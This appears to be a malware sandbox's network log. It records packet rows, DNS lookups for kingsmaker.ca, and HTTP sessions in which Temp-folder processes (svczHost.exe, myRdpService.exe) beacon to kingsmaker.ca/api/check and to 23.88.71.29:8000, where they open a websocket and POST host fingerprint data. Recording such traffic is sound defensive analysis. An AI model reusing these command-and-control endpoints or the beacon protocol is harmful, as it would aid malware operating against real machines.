                                                                                                            Nov 29, 2024 09:11:32.649039984 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.649039984 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.649039984 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.649046898 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.649085999 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.649235964 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.651657104 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.651668072 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.651838064 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.651838064 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.651844978 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.651884079 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.651984930 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.653565884 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.653697014 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.653717041 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.653717041 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.653816938 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.653820038 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.653862953 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.656277895 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.656286001 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.656455040 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.656455040 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.656455040 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.656461000 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.656563044 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.656663895 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.659502983 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.659512043 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.659646988 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.659754992 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.659758091 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.659831047 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.662180901 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.662194014 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.662306070 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.662309885 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.662463903 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.663788080 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.663934946 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.663934946 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.663985968 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.718422890 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.718430996 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.765124083 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.853542089 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.854629993 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.856427908 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.856436968 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.857506990 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.857691050 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.857697010 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.858288050 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.858445883 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.859281063 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.859394073 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.859397888 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.860538006 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.861934900 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.861943960 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.862637997 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.863212109 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.863215923 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.863970041 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.864352942 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.865432024 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.865439892 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.866436958 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.866439104 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.866823912 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.866827965 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.867568970 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.869565010 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.869575024 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.870606899 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.870821953 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.870826960 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.871961117 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.872477055 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.872672081 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.873869896 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.873873949 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.875010014 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.875854015 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.875861883 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.876919031 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.876923084 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.877302885 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.878048897 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.878757000 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.878765106 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.880152941 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.880156040 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.881099939 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.881128073 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.881135941 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.882431030 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.882433891 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.883570910 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.883887053 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.883893967 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.885094881 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.885097980 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.886235952 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.887212992 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.887221098 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.888528109 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.888530970 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.889668941 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.890008926 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.890017033 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.890810966 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.890814066 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.891195059 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.891937017 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.892743111 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.892750978 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.894040108 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.894042969 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.895179987 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.895910978 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.895920038 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.896115065 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.897278070 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:32.897283077 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:32.898418903 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.091723919 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.091736078 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.092649937 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.093215942 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.093219995 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.093971968 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.094520092 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.094527960 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.094724894 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.095067024 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.095071077 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.095370054 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.097346067 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.097353935 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.097518921 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.097518921 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.097527981 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.097563028 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.097661018 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.097661018 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.099992037 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.099999905 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.100145102 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.100188971 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.100188971 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.100193024 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.100238085 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.100286961 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.100482941 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.103421926 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.103432894 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.103547096 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.103646994 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.103652954 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.103794098 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.103849888 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.106017113 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.106026888 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.106177092 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.106177092 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.106184006 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.106225014 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.106323004 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.108349085 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.108403921 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:33.108500957 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.108549118 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.108597994 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:33.108597994 CET49766443192.168.11.30172.67.179.67
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 29, 2024 09:08:57.827466011 CET6364853192.168.11.301.1.1.1
                                                                                                            Nov 29, 2024 09:08:57.987987041 CET53636481.1.1.1192.168.11.30
                                                                                                            Nov 29, 2024 09:09:16.316426039 CET6519653192.168.11.301.1.1.1
                                                                                                            Nov 29, 2024 09:09:16.476017952 CET53651961.1.1.1192.168.11.30
                                                                                                            Nov 29, 2024 09:09:22.652412891 CET52738443192.168.11.30172.64.41.3
                                                                                                            Nov 29, 2024 09:09:22.813910961 CET44352738172.64.41.3192.168.11.30
                                                                                                            Nov 29, 2024 09:09:22.813955069 CET44352738172.64.41.3192.168.11.30
                                                                                                            Nov 29, 2024 09:09:22.813985109 CET44352738172.64.41.3192.168.11.30
                                                                                                            Nov 29, 2024 09:09:22.815511942 CET52738443192.168.11.30172.64.41.3
                                                                                                            Nov 29, 2024 09:09:22.835443020 CET52738443192.168.11.30172.64.41.3
                                                                                                            Nov 29, 2024 09:09:22.835576057 CET52738443192.168.11.30172.64.41.3
                                                                                                            Nov 29, 2024 09:09:22.836188078 CET52738443192.168.11.30172.64.41.3
                                                                                                            Nov 29, 2024 09:09:22.994829893 CET44352738172.64.41.3192.168.11.30
                                                                                                            Nov 29, 2024 09:09:22.994865894 CET44352738172.64.41.3192.168.11.30
                                                                                                            Nov 29, 2024 09:09:22.994885921 CET44352738172.64.41.3192.168.11.30
                                                                                                            Nov 29, 2024 09:09:22.994908094 CET44352738172.64.41.3192.168.11.30
                                                                                                            Nov 29, 2024 09:09:22.996280909 CET44352738172.64.41.3192.168.11.30
                                                                                                            Nov 29, 2024 09:09:22.998286009 CET44352738172.64.41.3192.168.11.30
                                                                                                            Nov 29, 2024 09:09:22.998894930 CET52738443192.168.11.30172.64.41.3
                                                                                                            Nov 29, 2024 09:09:22.998941898 CET52738443192.168.11.30172.64.41.3
                                                                                                            Nov 29, 2024 09:09:23.025675058 CET52738443192.168.11.30172.64.41.3
                                                                                                            Nov 29, 2024 09:09:23.158060074 CET44352738172.64.41.3192.168.11.30
                                                                                                            Nov 29, 2024 09:09:23.184878111 CET52738443192.168.11.30172.64.41.3
                                                                                                            Nov 29, 2024 09:09:36.760760069 CET6330853192.168.11.301.1.1.1
                                                                                                            Nov 29, 2024 09:09:36.920553923 CET53633081.1.1.1192.168.11.30
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 29, 2024 09:08:57.827466011 CET192.168.11.301.1.1.10xa029Standard query (0)kingsmaker.caA (IP address)IN (0x0001)false
                                                                                                            Nov 29, 2024 09:09:16.316426039 CET192.168.11.301.1.1.10x5234Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                            Nov 29, 2024 09:09:36.760760069 CET192.168.11.301.1.1.10x1a62Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 29, 2024 09:08:57.987987041 CET1.1.1.1192.168.11.300xa029No error (0)kingsmaker.ca172.67.179.67A (IP address)IN (0x0001)false
                                                                                                            Nov 29, 2024 09:08:57.987987041 CET1.1.1.1192.168.11.300xa029No error (0)kingsmaker.ca104.21.75.170A (IP address)IN (0x0001)false
                                                                                                            Nov 29, 2024 09:09:16.476017952 CET1.1.1.1192.168.11.300x5234No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                            Nov 29, 2024 09:09:16.476017952 CET1.1.1.1192.168.11.300x5234No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                            Nov 29, 2024 09:09:36.920553923 CET1.1.1.1192.168.11.300x1a62No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                            Nov 29, 2024 09:09:36.920553923 CET1.1.1.1192.168.11.300x1a62No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                            • kingsmaker.ca
                                                                                                            • chrome.cloudflare-dns.com
                                                                                                            • armmf.adobe.com
                                                                                                            • 23.88.71.29:8000
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.11.3049759172.67.179.67809708C:\Windows\Temp\svczHost.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 29, 2024 09:09:40.654823065 CET72OUTGET /api/check HTTP/1.1
                                                                                                            Host: kingsmaker.ca
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 29, 2024 09:09:41.144093037 CET1289INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:41 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-store,no-cache
                                                                                                            Pragma: no-cache
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mpftP27n0YI67DCl55Af2Pq5zmeP8Uj%2FkY1L9RbIR0pgne0%2BRyms1VfT5k%2BL6L9DPa41zya0OxVeyEDWBjGHuztavNuFz6%2F3YuKdbtswy0JQfFKyA8VYFpJ5l%2FlkQylydW3X%2B01KrglP"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=12979&min_rtt=1133&rtt_var=20576&sent=22&recv=26&lost=0&retrans=0&sent_bytes=15449&recv_bytes=10686&delivery_rate=9598246&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11ded98aca984-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=159210&min_rtt=159210&rtt_var=79605&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=72&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 31 36 33 0d 0a 31 37 33 32 38 36 37 37 38 30 7c 6e 35 42 35 42 55 63 36 71 5a 54 77 45 47 35 6c 63 36 39 37 30 68 6c 49 78 62 39 34 59 69 53 4d 6e 33 57 79 2f 4f 63 5a 69 67 72 42 52 4e 34 78 42 42 66 6d 31 54 54 4f 78 6c 63 7a 75 55 68 6d 36 43 4d 2f 42 62 70 62 65 56 74 39 48 46 79 74 4c 66 6b 43 74 4e 58 34 6a 39 4b 61 38 36 68 41 2f 6c 39 72 2f 54 6d 41 74 33 56 4c 73 4d 53 71 38 5a 62 58 34 32 4d 4e 76 37 59 36 55 50 6d 52 50 52 75 46 6b 72 4c 50 33 2f 56 43 62 4e 6d 34 63 37 54 79 57 42 79 54 55 67 6c 4e 2f 73 66 37 44 72 66 55 4d 68 43 46 2f 46 46 55 61 62 41 51 37 2b 5a 52 74 68 66 69 4a 41 56 73 78 77 39 4c 71 71 53 2f
                                                                                                            Data Ascii: 1631732867780|n5B5BUc6qZTwEG5lc6970hlIxb94YiSMn3Wy/OcZigrBRN4xBBfm1TTOxlczuUhm6CM/BbpbeVt9HFytLfkCtNX4j9Ka86hA/l9r/TmAt3VLsMSq8ZbX42MNv7Y6UPmRPRuFkrLP3/VCbNm4c7TyWByTUglN/sf7DrfUMhCF/FFUabAQ7+ZRthfiJAVsxw9LqqS/
                                                                                                            Nov 29, 2024 09:09:41.144138098 CET150INData Raw: 6a 67 6d 32 2b 39 6d 79 79 39 4b 41 39 68 67 74 46 69 37 56 56 72 33 30 69 4b 76 57 75 33 36 61 64 36 69 2b 53 78 72 48 2f 58 31 74 6a 44 73 54 79 48 79 42 69 54 6e 36 70 4f 35 74 6f 51 64 51 6d 50 76 51 56 6d 38 32 61 34 61 4d 68 66 6f 55 57 30
                                                                                                            Data Ascii: jgm2+9myy9KA9hgtFi7VVr30iKvWu36ad6i+SxrH/X1tjDsTyHyBiTn6pO5toQdQmPvQVm82a4aMhfoUW0lqWgJP8AcUZa6d7qdd+PjzPCQ1EO8N4Ou7Rxzt8gXS9QrdXLvkp/5o3XlA/0HtFg==
                                                                                                            Nov 29, 2024 09:09:41.144171953 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.11.304976323.88.71.2980005496C:\Windows\Temp\myRdpService.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 29, 2024 09:10:40.757949114 CET164OUTGET /client/ws HTTP/1.1
                                                                                                            Host: 23.88.71.29:8000
                                                                                                            Connection: Upgrade
                                                                                                            Upgrade: websocket
                                                                                                            Sec-WebSocket-Key: HypkmC7LuEqn6kjELov16g==
                                                                                                            Sec-WebSocket-Version: 13
                                                                                                            Nov 29, 2024 09:10:41.621452093 CET847INHTTP/1.1 101 Switching Protocols
                                                                                                            Upgrade: Websocket
                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                            Sec-Websocket-Accept: pIxbHB6PWzkLnVMK9KCpblsjnoU=
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fg7sQBlmks%2FRh3oJXPZXVaAuEwvwp2n8KYaVhn4sAEv47uaeiKCRRFMufkKfJs49XkDTWZVNE2z7999M85x7EVTdpdQX2ZR5F0%2BsBD0WImJbT4GEuyHcY7SpKfLtpvGNoUvvnKPUgZK4"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            CF-RAY: 8ea11f65bd01d21f-FRA
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6410&min_rtt=5504&rtt_var=3276&sent=10&recv=12&lost=0&retrans=0&sent_bytes=1661&recv_bytes=6928&delivery_rate=494999&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Connection: Upgrade
                                                                                                            Date: Fri, 29 Nov 2024 08:10:41 GMT


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.11.304976423.88.71.2980005496C:\Windows\Temp\myRdpService.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 29, 2024 09:10:45.609684944 CET234OUTPOST /api/registry HTTP/1.1
                                                                                                            Host: 23.88.71.29:8000
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 102
                                                                                                            Data Raw: 22 45 43 41 34 45 37 46 36 34 35 43 45 41 42 43 46 31 34 31 44 36 30 32 43 43 33 30 38 39 36 37 32 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22
                                                                                                            Data Ascii: "ECA4E7F645CEABCF141D602CC3089672|Microsoft Windows 10 Pro|10.0.19042 N/A Build 19042-10.0.19041.1081"
                                                                                                            Nov 29, 2024 09:10:46.479887962 CET807INHTTP/1.1 200 OK
                                                                                                            Content-Type: text/html
                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tJdbqYrfjpxAaDRioSqAuayUjZVMjTXtP9Ltpv8gqKMLc%2Br32DY4tOcecpQZk9a1%2BkuCjH4Yegaf2fCrIJ7%2BdV0wOXZwInUkWDVFzSGtWv%2BZx01uyEdQqrNb4tyaXxDtx%2FBSjz7PwDi8"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            CF-RAY: 8ea11f841a029018-FRA
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5310&min_rtt=5310&rtt_var=2655&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=379&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Date: Fri, 29 Nov 2024 08:10:46 GMT
                                                                                                            Content-Length: 32
                                                                                                            Data Raw: 36 63 63 65 37 31 38 32 64 35 30 65 64 33 64 37 65 36 31 31 34 36 36 63 63 65 61 66 61 35 65 32
                                                                                                            Data Ascii: 6cce7182d50ed3d7e611466cceafa5e2


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.11.304976523.88.71.2980005496C:\Windows\Temp\myRdpService.exe
                                                                                                            TimestampBytes transferredDirectionData
